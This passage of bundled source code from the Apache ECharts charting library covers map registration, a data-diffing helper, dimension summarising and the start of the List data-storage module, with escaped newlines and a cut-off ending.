}\n *     });\n *\n *     echarts.registerMap('eu', [\n *         {svg: eu-topographic.svg},\n *         {geoJSON: eu.json}\n *     ])\n */\nfunction registerMap(mapName, geoJson, specialAreas) {\n    mapDataStorage.registerMap(mapName, geoJson, specialAreas);\n}\n\n/**\n * @param {string} mapName\n * @return {Object}\n */\nfunction getMap(mapName) {\n    // For backward compatibility, only return the first one.\n    var records = mapDataStorage.retrieveMap(mapName);\n    return records && records[0] && {\n        geoJson: records[0].geoJSON,\n        specialAreas: records[0].specialAreas\n    };\n}\n\nregisterVisual(PRIORITY_VISUAL_GLOBAL, seriesColor);\nregisterPreprocessor(backwardCompat);\nregisterProcessor(PRIORITY_PROCESSOR_DATASTACK, dataStack);\nregisterLoading('default', loadingDefault);\n\n// Default actions\n\nregisterAction({\n    type: 'highlight',\n    event: 'highlight',\n    update: 'highlight'\n}, noop);\n\nregisterAction({\n    type: 'downplay',\n    event: 'downplay',\n    update: 'downplay'\n}, noop);\n\n// Default theme\nregisterTheme('light', lightTheme);\nregisterTheme('dark', theme);\n\n// For backward compatibility, where the namespace `dataTool` will\n// be mounted on `echarts` is the extension `dataTool` is imported.\nvar dataTool = {};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nfunction defaultKeyGetter(item) {\n    return item;\n}\n\n/**\n * @param {Array} oldArr\n * @param {Array} newArr\n * @param {Function} oldKeyGetter\n * @param {Function} newKeyGetter\n * @param {Object} [context] Can be visited by this.context in callback.\n */\nfunction DataDiffer(oldArr, newArr, oldKeyGetter, newKeyGetter, context) {\n    this._old = oldArr;\n    this._new = newArr;\n\n    this._oldKeyGetter = oldKeyGetter || defaultKeyGetter;\n    this._newKeyGetter = newKeyGetter || defaultKeyGetter;\n\n    this.context = context;\n}\n\nDataDiffer.prototype = {\n\n    constructor: DataDiffer,\n\n    /**\n     * Callback function when add a data\n     */\n    add: function (func) {\n        this._add = func;\n        return this;\n    },\n\n    /**\n     * Callback function when update a data\n     */\n    update: function (func) {\n        this._update = func;\n        return this;\n    },\n\n    /**\n     * Callback function when remove a data\n     */\n    remove: function (func) {\n        this._remove = func;\n        return this;\n    },\n\n    execute: function () {\n        var oldArr = this._old;\n        var newArr = this._new;\n\n        var oldDataIndexMap = {};\n        var newDataIndexMap = {};\n        var oldDataKeyArr = [];\n        var newDataKeyArr = [];\n        var i;\n\n        initIndexMap(oldArr, oldDataIndexMap, oldDataKeyArr, '_oldKeyGetter', this);\n        initIndexMap(newArr, newDataIndexMap, newDataKeyArr, '_newKeyGetter', this);\n\n        for (i = 0; i < oldArr.length; i++) {\n            var key = oldDataKeyArr[i];\n            var idx = newDataIndexMap[key];\n\n            // idx can never be empty array here. see 'set null' logic below.\n            if (idx != null) {\n                // Consider there is duplicate key (for example, use dataItem.name as key).\n                // We should make sure every item in newArr and oldArr can be visited.\n                var len = idx.length;\n                if (len) {\n                    len === 1 && (newDataIndexMap[key] = null);\n                    idx = idx.shift();\n                }\n                else {\n                    newDataIndexMap[key] = null;\n                }\n                this._update && this._update(idx, i);\n            }\n            else {\n                this._remove && this._remove(i);\n            }\n        }\n\n        for (var i = 0; i < newDataKeyArr.length; i++) {\n            var key = newDataKeyArr[i];\n            if (newDataIndexMap.hasOwnProperty(key)) {\n                var idx = newDataIndexMap[key];\n                if (idx == null) {\n                    continue;\n                }\n                // idx can never be empty array here. see 'set null' logic above.\n                if (!idx.length) {\n                    this._add && this._add(idx);\n                }\n                else {\n                    for (var j = 0, len = idx.length; j < len; j++) {\n                        this._add && this._add(idx[j]);\n                    }\n                }\n            }\n        }\n    }\n};\n\nfunction initIndexMap(arr, map, keyArr, keyGetterName, dataDiffer) {\n    for (var i = 0; i < arr.length; i++) {\n        // Add prefix to avoid conflict with Object.prototype.\n        var key = '_ec_' + dataDiffer[keyGetterName](arr[i], i);\n        var existence = map[key];\n        if (existence == null) {\n            keyArr.push(key);\n            map[key] = i;\n        }\n        else {\n            if (!existence.length) {\n                map[key] = existence = [existence];\n            }\n            existence.push(i);\n        }\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar OTHER_DIMENSIONS = createHashMap([\n    'tooltip', 'label', 'itemName', 'itemId', 'seriesName'\n]);\n\nfunction summarizeDimensions(data) {\n    var summary = {};\n    var encode = summary.encode = {};\n    var notExtraCoordDimMap = createHashMap();\n    var defaultedLabel = [];\n    var defaultedTooltip = [];\n\n    // See the comment of `List.js#userOutput`.\n    var userOutput = summary.userOutput = {\n        dimensionNames: data.dimensions.slice(),\n        encode: {}\n    };\n\n    each$1(data.dimensions, function (dimName) {\n        var dimItem = data.getDimensionInfo(dimName);\n\n        var coordDim = dimItem.coordDim;\n        if (coordDim) {\n            if (__DEV__) {\n                assert$1(OTHER_DIMENSIONS.get(coordDim) == null);\n            }\n\n            var coordDimIndex = dimItem.coordDimIndex;\n            getOrCreateEncodeArr(encode, coordDim)[coordDimIndex] = dimName;\n\n            if (!dimItem.isExtraCoord) {\n                notExtraCoordDimMap.set(coordDim, 1);\n\n                // Use the last coord dim (and label friendly) as default label,\n                // because when dataset is used, it is hard to guess which dimension\n                // can be value dimension. If both show x, y on label is not look good,\n                // and conventionally y axis is focused more.\n                if (mayLabelDimType(dimItem.type)) {\n                    defaultedLabel[0] = dimName;\n                }\n\n                // User output encode do not contain generated coords.\n                // And it only has index. User can use index to retrieve value from the raw item array.\n                getOrCreateEncodeArr(userOutput.encode, coordDim)[coordDimIndex] = dimItem.index;\n            }\n            if (dimItem.defaultTooltip) {\n                defaultedTooltip.push(dimName);\n            }\n        }\n\n        OTHER_DIMENSIONS.each(function (v, otherDim) {\n            var encodeArr = getOrCreateEncodeArr(encode, otherDim);\n\n            var dimIndex = dimItem.otherDims[otherDim];\n            if (dimIndex != null && dimIndex !== false) {\n                encodeArr[dimIndex] = dimItem.name;\n            }\n        });\n    });\n\n    var dataDimsOnCoord = [];\n    var encodeFirstDimNotExtra = {};\n\n    notExtraCoordDimMap.each(function (v, coordDim) {\n        var dimArr = encode[coordDim];\n        // ??? FIXME extra coord should not be set in dataDimsOnCoord.\n        // But should fix the case that radar axes: simplify the logic\n        // of `completeDimension`, remove `extraPrefix`.\n        encodeFirstDimNotExtra[coordDim] = dimArr[0];\n        // Not necessary to remove duplicate, because a data\n        // dim canot on more than one coordDim.\n        dataDimsOnCoord = dataDimsOnCoord.concat(dimArr);\n    });\n\n    summary.dataDimsOnCoord = dataDimsOnCoord;\n    summary.encodeFirstDimNotExtra = encodeFirstDimNotExtra;\n\n    var encodeLabel = encode.label;\n    // FIXME `encode.label` is not recommanded, because formatter can not be set\n    // in this way. Use label.formatter instead. May be remove this approach someday.\n    if (encodeLabel && encodeLabel.length) {\n        defaultedLabel = encodeLabel.slice();\n    }\n\n    var encodeTooltip = encode.tooltip;\n    if (encodeTooltip && encodeTooltip.length) {\n        defaultedTooltip = encodeTooltip.slice();\n    }\n    else if (!defaultedTooltip.length) {\n        defaultedTooltip = defaultedLabel.slice();\n    }\n\n    encode.defaultedLabel = defaultedLabel;\n    encode.defaultedTooltip = defaultedTooltip;\n\n    return summary;\n}\n\nfunction getOrCreateEncodeArr(encode, dim) {\n    if (!encode.hasOwnProperty(dim)) {\n        encode[dim] = [];\n    }\n    return encode[dim];\n}\n\nfunction getDimensionTypeByAxis(axisType) {\n    return axisType === 'category'\n        ? 'ordinal'\n        : axisType === 'time'\n        ? 'time'\n        : 'float';\n}\n\nfunction mayLabelDimType(dimType) {\n    // In most cases, ordinal and time do not suitable for label.\n    // Ordinal info can be displayed on axis. Time is too long.\n    return !(dimType === 'ordinal' || dimType === 'time');\n}\n\n// function findTheLastDimMayLabel(data) {\n//     // Get last value dim\n//     var dimensions = data.dimensions.slice();\n//     var valueType;\n//     var valueDim;\n//     while (dimensions.length && (\n//         valueDim = dimensions.pop(),\n//         valueType = data.getDimensionInfo(valueDim).type,\n//         valueType === 'ordinal' || valueType === 'time'\n//     )) {} // jshint ignore:line\n//     return valueDim;\n// }\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @class\n * @param {Object|DataDimensionInfo} [opt] All of the fields will be shallow copied.\n */\nfunction DataDimensionInfo(opt) {\n    if (opt != null) {\n        extend(this, opt);\n    }\n\n    /**\n     * Dimension name.\n     * Mandatory.\n     * @type {string}\n     */\n    // this.name;\n\n    /**\n     * The origin name in dimsDef, see source helper.\n     * If displayName given, the tooltip will displayed vertically.\n     * Optional.\n     * @type {string}\n     */\n    // this.displayName;\n\n    /**\n     * Which coordSys dimension this dimension mapped to.\n     * A `coordDim` can be a \"coordSysDim\" that the coordSys required\n     * (for example, an item in `coordSysDims` of `model/referHelper#CoordSysInfo`),\n     * or an generated \"extra coord name\" if does not mapped to any \"coordSysDim\"\n     * (That is determined by whether `isExtraCoord` is `true`).\n     * Mandatory.\n     * @type {string}\n     */\n    // this.coordDim;\n\n    /**\n     * The index of this dimension in `series.encode[coordDim]`.\n     * Mandatory.\n     * @type {number}\n     */\n    // this.coordDimIndex;\n\n    /**\n     * Dimension type. The enumerable values are the key of\n     * `dataCtors` of `data/List`.\n     * Optional.\n     * @type {string}\n     */\n    // this.type;\n\n    /**\n     * This index of this dimension info in `data/List#_dimensionInfos`.\n     * Mandatory after added to `data/List`.\n     * @type {number}\n     */\n    // this.index;\n\n    /**\n     * The format of `otherDims` is:\n     * ```js\n     * {\n     *     tooltip: number optional,\n     *     label: number optional,\n     *     itemName: number optional,\n     *     seriesName: number optional,\n     * }\n     * ```\n     *\n     * A `series.encode` can specified these fields:\n     * ```js\n     * encode: {\n     *     // \"3, 1, 5\" is the index of data dimension.\n     *     tooltip: [3, 1, 5],\n     *     label: [0, 3],\n     *     ...\n     * }\n     * ```\n     * `otherDims` is the parse result of the `series.encode` above, like:\n     * ```js\n     * // Suppose the index of this data dimension is `3`.\n     * this.otherDims = {\n     *     // `3` is at the index `0` of the `encode.tooltip`\n     *     tooltip: 0,\n     *     // `3` is at the index `1` of the `encode.tooltip`\n     *     label: 1\n     * };\n     * ```\n     *\n     * This prop should never be `null`/`undefined` after initialized.\n     * @type {Object}\n     */\n    this.otherDims = {};\n\n    /**\n     * Be `true` if this dimension is not mapped to any \"coordSysDim\" that the\n     * \"coordSys\" required.\n     * Mandatory.\n     * @type {boolean}\n     */\n    // this.isExtraCoord;\n\n    /**\n     * @type {module:data/OrdinalMeta}\n     */\n    // this.ordinalMeta;\n\n    /**\n     * Whether to create inverted indices.\n     * @type {boolean}\n     */\n    // this.createInvertedIndices;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/* global Float64Array, Int32Array, Uint32Array, Uint16Array */\n\n/**\n * List for data storage\n * @module echarts/data/List\n */\n\nvar isObject$4 = isObject$1;\n\nvar UNDEFINED = 'undefined';\nvar INDEX_NOT_FOUND = -1;\n\n// Use prefix to avoid index to be the same as otherIdList[idx],\n// which will cause weird udpate animation.\nvar ID_PREFIX = 'e\\0\\0';\n\nvar dataCtors = {\n    'float': typeof Float64Array === UNDEFINED\n        ? Array : Float64Array,\n    'int': typeof Int32Array === UNDEFINED\n        ? Array : Int32Array,\n    // Ordinal data type can be string or int\n    'ordinal': Array,\n    'number': Array,\n    'time': Array\n};\n\n// Caution: MUST not use `new CtorUint32Array(arr, 0, len)`, because the Ctor of array is\n// different from the Ctor of typed array.\nvar CtorUint32Array = typeof Uint32Array === UNDEFINED ? Array : Uint32Array;\nvar CtorInt32Array = typeof Int32Array === UNDEFINED ? Array : Int32Array;\nvar CtorUint16Array = typeof Uint16Array === UNDEFINED ? Array : Uint16Array;\n\nfunction getIndicesCtor(list) {\n    // The possible max value in this._indicies is always this._rawCount despite of filtering.\n    return list._rawCount > 65535 ? CtorUint32Array : CtorUint16Array;\n}\n\nfunction cloneChunk(originalChunk) {\n    var Ctor = originalChunk.constructor;\n    // Only shallow clone is enough when Array.\n    return Ctor === Array ? originalChunk.slice() : new Ctor(originalChunk);\n}\n\nvar TRANSFERABLE_PROPERTIES = [\n    'hasItemOption', '_nameList', '_idList', '_invertedIndicesMap',\n    '_rawData', '_chunkSize', '_chunkCount', '_dimValueGetter',\n    '_count', '_rawCount', '_nameDimIdx', '_idDimIdx'\n];\nvar CLONE_PROPERTIES = [\n    '_extent', '_approximateExtent', '_rawExtent'\n];\n\nfunction transferProperties(target, source) {\n    each$1(TRANSFERABLE_PROPERTIES.concat(source.__wrappedMethods || []), function (propName) {\n        if (source.hasOwnProperty(propName)) {\n            target[propName] = source[propName];\n        }\n    });\n\n    target.__wrappedMethods = source.__wrappedMethods;\n\n    each$1(CLONE_PROPERTIES, function (propName) {\n        target[propName] = clone(source[propName]);\n    });\n\n    target._calculationInfo = extend(source._calculationInfo);\n}\n\n\n\n\n\n/**\n * @constructor\n * @alias module:echarts/data/List\n *\n * @param {Array.<string|Object|module:data/DataDimensionInfo>} dimensions\n *      For example, ['someDimName', {name: 'someDimName', type: 'someDimType'}, ...].\n *      Dimensions should be concrete names like x, y, z, lng, lat, angle, radius\n * @param {module:echarts/model/Model} hostModel\n */\nvar List = function (dimensions, hostModel) {\n\n    dimensions = dimensions || ['x', 'y'];\n\n    var dimensionInfos = {};\n    var dimensionNames = [];\n    var invertedIndicesMap = {};\n\n    for (var i = 0; i < dimensions.length; i++) {\n        // Use the original dimensions[i], where other flag props may exists.\n        var dimensionInfo = dimensions[i];\n\n        if (isString(dimensionInfo)) {\n            dimensionInfo = new DataDimensionInfo({name: dimensionInfo});\n        }\n        else if (!(dimensionInfo instanceof DataDimensionInfo)) {\n            dimensionInfo = new DataDimensionInfo(dimensionInfo);\n        }\n\n        var dimensionName = dimensionInfo.name;\n        dimensionInfo.type = dimensionInfo.type || 'float';\n        if (!dimensionInfo.coordDim) {\n            dimensionInfo.coordDim = dimensionName;\n            dimensionInfo.coordDimIndex = 0;\n        }\n\n        dimensionInfo.otherDims = dimensionInfo.otherDims || {};\n        dimensionNames.push(dimensionName);\n        dimensionInfos[dimensionName] = dimensionInfo;\n\n        dimensionInfo.index = i;\n\n        if (dimensionInfo.createInvertedIndices) {\n            invertedIndicesMap[dimensionName] = [];\n        }\n    }\n\n    /**\n     * @readOnly\n     * @type {Array.<string>}\n     */\n    this.dimensions = dimensionNames;\n\n    /**\n     * Infomation of each data dimension, like data type.\n     * @type {Object}\n     */\n    this._dimensionInfos = dimensionInfos;\n\n    /**\n     * @type {module:echarts/model/Model}\n     */\n    this.hostModel = hostModel;\n\n    /**\n     * @type {module:echarts/model/Model}\n     */\n    this.dataType;\n\n    /**\n     * Indices stores the indices of data subset after filtered.\n     * This data subset will be used in chart.\n     * @type {Array.<number>}\n     * @readOnly\n     */\n    this._indices = null;\n\n    this._count = 0;\n    this._rawCount = 0;\n\n    /**\n     * Data storage\n     * @type {Object.<key, Array.<TypedArray|Array>>}\n     * @private\n     */\n    this._storage = {};\n\n    /**\n     * @type {Array.<string>}\n     */\n    this._nameList = [];\n    /**\n     * @type {Array.<string>}\n     */\n    this._idList = [];\n\n    /**\n     * Models of data option is stored sparse for optimizing memory cost\n     * @type {Array.<module:echarts/model/Model>}\n     * @private\n     */\n    this._optionModels = [];\n\n    /**\n     * Global visual properties after visual coding\n     * @type {Object}\n     * @private\n     */\n    this._visual = {};\n\n    /**\n     * Globel layout properties.\n     * @type {Object}\n     * @private\n     */\n    this._layout = {};\n\n    /**\n     * Item visual properties after visual coding\n     * @type {Array.<Object>}\n     * @private\n     */\n    this._itemVisuals = [];\n\n    /**\n     * Key: visual type, Value: boolean\n     * @type {Object}\n     * @readOnly\n     */\n    this.hasItemVisual = {};\n\n    /**\n     * Item layout properties after layout\n     * @type {Array.<Object>}\n     * @private\n     */\n    this._itemLayouts = [];\n\n    /**\n     * Graphic elemnents\n     * @type {Array.<module:zrender/Element>}\n     * @private\n     */\n    this._graphicEls = [];\n\n    /**\n     * Max size of each chunk.\n     * @type {number}\n     * @private\n     */\n    this._chunkSize = 1e5;\n\n    /**\n     * @type {number}\n     * @private\n     */\n    this._chunkCount = 0;\n\n    /**\n     * @type {Array.<Array|Object>}\n     * @private\n     */\n    this._rawData;\n\n    /**\n     * Raw extent will not be cloned, but only transfered.\n     * It will not be calculated util needed.\n     * key: dim,\n     * value: {end: number, extent: Array.<number>}\n     * @type {Object}\n     * @private\n     */\n    this._rawExtent = {};\n\n    /**\n     * @type {Object}\n     * @private\n     */\n    this._extent = {};\n\n    /**\n     * key: dim\n     * value: extent\n     * @type {Object}\n     * @private\n     */\n    this._approximateExtent = {};\n\n    /**\n     * Cache summary info for fast visit. See \"dimensionHelper\".\n     * @type {Object}\n     * @private\n     */\n    this._dimensionsSummary = summarizeDimensions(this);\n\n    /**\n     * @type {Object.<Array|TypedArray>}\n     * @private\n     */\n    this._invertedIndicesMap = invertedIndicesMap;\n\n    /**\n     * @type {Object}\n     * @private\n     */\n    this._calculationInfo = {};\n\n    /**\n     * User output info of this data.\n     * DO NOT use it in other places!\n     *\n     * When preparing user params for user callbacks, we have\n     * to clone these inner data structures to prevent users\n     * from modifying them to effect built-in logic. And for\n     * performance consideration we make this `userOutput` to\n     * avoid clone them too many times.\n     *\n     * @type {Object}\n     * @readOnly\n     */\n    this.userOutput = this._dimensionsSummary.userOutput;\n};\n\nvar listProto = List.prototype;\n\nlistProto.type = 'list';\n\n/**\n * If each data item has it's own option\n * @type {boolean}\n */\nlistProto.hasItemOption = true;\n\n/**\n * The meanings of the input parameter `dim`:\n *\n * + If dim is a number (e.g., `1`), it means the index of the dimension.\n *   For example, `getDimension(0)` will return 'x' or 'lng' or 'radius'.\n * + If dim is a number-like string (e.g., `\"1\"`):\n *     + If there is the same concrete dim name defined in `this.dimensions`, it means that concrete name.\n *     + If not, it will be converted to a number, which means the index of the dimension.\n *        (why? because of the backward compatbility. We have been tolerating number-like string in\n *        dimension setting, although now it seems that it is not a good idea.)\n *     For example, `visualMap[i].dimension: \"1\"` is the same meaning as `visualMap[i].dimension: 1`,\n *     if no dimension name is defined as `\"1\"`.\n * + If dim is a not-number-like string, it means the concrete dim name.\n *   For example, it can be be default name `\"x\"`, `\"y\"`, `\"z\"`, `\"lng\"`, `\"lat\"`, `\"angle\"`, `\"radius\"`,\n *   or customized in `dimensions` property of option like `\"age\"`.\n *\n * Get dimension name\n * @param {string|number} dim See above.\n * @return {string} Concrete dim name.\n */\nlistProto.getDimension = function (dim) {\n    if (typeof dim === 'number'\n        // If being a number-like string but not being defined a dimension name.\n        || (!isNaN(dim) && !this._dimensionInfos.hasOwnProperty(dim))\n    ) {\n        dim = this.dimensions[dim];\n    }\n    return dim;\n};\n\n/**\n * Get type and calculation info of particular dimension\n * @param {string|number} dim\n *        Dimension can be concrete names like x, y, z, lng, lat, angle, radius\n *        Or a ordinal number. For example getDimensionInfo(0) will return 'x' or 'lng' or 'radius'\n */\nlistProto.getDimensionInfo = function (dim) {\n    // Do not clone, because there may be categories in dimInfo.\n    return this._dimensionInfos[this.getDimension(dim)];\n};\n\n/**\n * @return {Array.<string>} concrete dimension name list on coord.\n */\nlistProto.getDimensionsOnCoord = function () {\n    return this._dimensionsSummary.dataDimsOnCoord.slice();\n};\n\n/**\n * @param {string} coordDim\n * @param {number} [idx] A coordDim may map to more than one data dim.\n *        If idx is `true`, return a array of all mapped dims.\n *        If idx is not specified, return the first dim not extra.\n * @return {string|Array.<string>} concrete data dim.\n *        If idx is number, and not found, return null/undefined.\n *        If idx is `true`, and not found, return empty array (always return array).\n */\nlistProto.mapDimension = function (coordDim, idx) {\n    var dimensionsSummary = this._dimensionsSummary;\n\n    if (idx == null) {\n        return dimensionsSummary.encodeFirstDimNotExtra[coordDim];\n    }\n\n    var dims = dimensionsSummary.encode[coordDim];\n    return idx === true\n        // always return array if idx is `true`\n        ? (dims || []).slice()\n        : (dims && dims[idx]);\n};\n\n/**\n * Initialize from data\n * @param {Array.<Object|number|Array>} data source or data or data provider.\n * @param {Array.<string>} [nameLIst] The name of a datum is used on data diff and\n *        defualt label/tooltip.\n *        A name can be specified in encode.itemName,\n *        or dataItem.name (only for series option data),\n *        or provided in nameList from outside.\n * @param {Function} [dimValueGetter] (dataItem, dimName, dataIndex, dimIndex) => number\n */\nlistProto.initData = function (data, nameList, dimValueGetter) {\n\n    var notProvider = Source.isInstance(data) || isArrayLike(data);\n    if (notProvider) {\n        data = new DefaultDataProvider(data, this.dimensions.length);\n    }\n\n    if (__DEV__) {\n        if (!notProvider && (typeof data.getItem !== 'function' || typeof data.count !== 'function')) {\n            throw new Error('Inavlid data provider.');\n        }\n    }\n\n    this._rawData = data;\n\n    // Clear\n    this._storage = {};\n    this._indices = null;\n\n    this._nameList = nameList || [];\n\n    this._idList = [];\n\n    this._nameRepeatCount = {};\n\n    if (!dimValueGetter) {\n        this.hasItemOption = false;\n    }\n\n    /**\n     * @readOnly\n     */\n    this.defaultDimValueGetter = defaultDimValueGetters[\n        this._rawData.getSource().sourceFormat\n    ];\n    // Default dim value getter\n    this._dimValueGetter = dimValueGetter = dimValueGetter\n        || this.defaultDimValueGetter;\n    this._dimValueGetterArrayRows = defaultDimValueGetters.arrayRows;\n\n    // Reset raw extent.\n    this._rawExtent = {};\n\n    this._initDataFromProvider(0, data.count());\n\n    // If data has no item option.\n    if (data.pure) {\n        this.hasItemOption = false;\n    }\n};\n\nlistProto.getProvider = function () {\n    return this._rawData;\n};\n\n/**\n * Caution: Can be only called on raw data (before `this._indices` created).\n */\nlistProto.appendData = function (data) {\n    if (__DEV__) {\n        assert$1(!this._indices, 'appendData can only be called on raw data.');\n    }\n\n    var rawData = this._rawData;\n    var start = this.count();\n    rawData.appendData(data);\n    var end = rawData.count();\n    if (!rawData.persistent) {\n        end += start;\n    }\n    this._initDataFromProvider(start, end);\n};\n\n/**\n * Caution: Can be only called on raw data (before `this._indices` created).\n * This method does not modify `rawData` (`dataProvider`), but only\n * add values to storage.\n *\n * The final count will be increased by `Math.max(values.length, names.length)`.\n *\n * @param {Array.<Array.<*>>} values That is the SourceType: 'arrayRows', like\n *        [\n *            [12, 33, 44],\n *            [NaN, 43, 1],\n *            ['-', 'asdf', 0]\n *        ]\n *        Each item is exaclty cooresponding to a dimension.\n * @param {Array.<string>} [names]\n */\nlistProto.appendValues = function (values, names) {\n    var chunkSize = this._chunkSize;\n    var storage = this._storage;\n    var dimensions = this.dimensions;\n    var dimLen = dimensions.length;\n    var rawExtent = this._rawExtent;\n\n    var start = this.count();\n    var end = start + Math.max(values.length, names ? names.length : 0);\n    var originalChunkCount = this._chunkCount;\n\n    for (var i = 0; i < dimLen; i++) {\n        var dim = dimensions[i];\n        if (!rawExtent[dim]) {\n            rawExtent[dim] = getInitialExtent();\n        }\n        if (!storage[dim]) {\n            storage[dim] = [];\n        }\n        prepareChunks(storage, this._dimensionInfos[dim], chunkSize, originalChunkCount, end);\n        this._chunkCount = storage[dim].length;\n    }\n\n    var emptyDataItem = new Array(dimLen);\n    for (var idx = start; idx < end; idx++) {\n        var sourceIdx = idx - start;\n        var chunkIndex = Math.floor(idx / chunkSize);\n        var chunkOffset = idx % chunkSize;\n\n        // Store the data by dimensions\n        for (var k = 0; k < dimLen; k++) {\n            var dim = dimensions[k];\n            var val = this._dimValueGetterArrayRows(\n                values[sourceIdx] || emptyDataItem, dim, sourceIdx, k\n            );\n            storage[dim][chunkIndex][chunkOffset] = val;\n\n            var dimRawExtent = rawExtent[dim];\n            val < dimRawExtent[0] && (dimRawExtent[0] = val);\n            val > dimRawExtent[1] && (dimRawExtent[1] = val);\n        }\n\n        if (names) {\n            this._nameList[idx] = names[sourceIdx];\n        }\n    }\n\n    this._rawCount = this._count = end;\n\n    // Reset data extent\n    this._extent = {};\n\n    prepareInvertedIndex(this);\n};\n\nlistProto._initDataFromProvider = function (start, end) {\n    // Optimize.\n    if (start >= end) {\n        return;\n    }\n\n    var chunkSize = this._chunkSize;\n    var rawData = this._rawData;\n    var storage = this._storage;\n    var dimensions = this.dimensions;\n    var dimLen = dimensions.length;\n    var dimensionInfoMap = this._dimensionInfos;\n    var nameList = this._nameList;\n    var idList = this._idList;\n    var rawExtent = this._rawExtent;\n    var nameRepeatCount = this._nameRepeatCount = {};\n    var nameDimIdx;\n\n    var originalChunkCount = this._chunkCount;\n    for (var i = 0; i < dimLen; i++) {\n        var dim = dimensions[i];\n        if (!rawExtent[dim]) {\n            rawExtent[dim] = getInitialExtent();\n        }\n\n        var dimInfo = dimensionInfoMap[dim];\n        if (dimInfo.otherDims.itemName === 0) {\n            nameDimIdx = this._nameDimIdx = i;\n        }\n        if (dimInfo.otherDims.itemId === 0) {\n            this._idDimIdx = i;\n        }\n\n        if (!storage[dim]) {\n            storage[dim] = [];\n        }\n\n        prepareChunks(storage, dimInfo, chunkSize, originalChunkCount, end);\n\n        this._chunkCount = storage[dim].length;\n    }\n\n    var dataItem = new Array(dimLen);\n    for (var idx = start; idx < end; idx++) {\n        // NOTICE: Try not to write things into dataItem\n        dataItem = rawData.getItem(idx, dataItem);\n        // Each data item is value\n        // [1, 2]\n        // 2\n        // Bar chart, line chart which uses category axis\n        // only gives the 'y' value. 'x' value is the indices of category\n        // Use a tempValue to normalize the value to be a (x, y) value\n        var chunkIndex = Math.floor(idx / chunkSize);\n        var chunkOffset = idx % chunkSize;\n\n        // Store the data by dimensions\n        for (var k = 0; k < dimLen; k++) {\n            var dim = dimensions[k];\n            var dimStorage = storage[dim][chunkIndex];\n            // PENDING NULL is empty or zero\n            var val = this._dimValueGetter(dataItem, dim, idx, k);\n            dimStorage[chunkOffset] = val;\n\n            var dimRawExtent = rawExtent[dim];\n            val < dimRawExtent[0] && (dimRawExtent[0] = val);\n            val > dimRawExtent[1] && (dimRawExtent[1] = val);\n        }\n\n        // ??? FIXME not check by pure but sourceFormat?\n        // TODO refactor these logic.\n        if (!rawData.pure) {\n            var name = nameList[idx];\n\n            if (dataItem && name == null) {\n                // If dataItem is {name: ...}, it has highest priority.\n                // That is appropriate for many common cases.\n                if (dataItem.name != null) {\n                    // There is no other place to persistent dataItem.name,\n                    // so save it to nameList.\n                    nameList[idx] = name = dataItem.name;\n                }\n                else if (nameDimIdx != null) {\n                    var nameDim = dimensions[nameDimIdx];\n                    var nameDimChunk = storage[nameDim][chunkIndex];\n                    if (nameDimChunk) {\n                        name = nameDimChunk[chunkOffset];\n                        var ordinalMeta = dimensionInfoMap[nameDim].ordinalMeta;\n                        if (ordinalMeta && ordinalMeta.categories.length) {\n                            name = ordinalMeta.categories[name];\n                        }\n                    }\n                }\n            }\n\n            // Try using the id in option\n            // id or name is used on dynamical data, mapping old and new items.\n            var id = dataItem == null ? null : dataItem.id;\n\n            if (id == null && name != null) {\n                // Use name as id and add counter to avoid same name\n                nameRepeatCount[name] = nameRepeatCount[name] || 0;\n                id = name;\n                if (nameRepeatCount[name] > 0) {\n                    id += '__ec__' + nameRepeatCount[name];\n                }\n                nameRepeatCount[name]++;\n            }\n            id != null && (idList[idx] = id);\n        }\n    }\n\n    if (!rawData.persistent && rawData.clean) {\n        // Clean unused data if data source is typed array.\n        rawData.clean();\n    }\n\n    this._rawCount = this._count = end;\n\n    // Reset data extent\n    this._extent = {};\n\n    prepareInvertedIndex(this);\n};\n\nfunction prepareChunks(storage, dimInfo, chunkSize, chunkCount, end) {\n    var DataCtor = dataCtors[dimInfo.type];\n    var lastChunkIndex = chunkCount - 1;\n    var dim = dimInfo.name;\n    var resizeChunkArray = storage[dim][lastChunkIndex];\n    if (resizeChunkArray && resizeChunkArray.length < chunkSize) {\n        var newStore = new DataCtor(Math.min(end - lastChunkIndex * 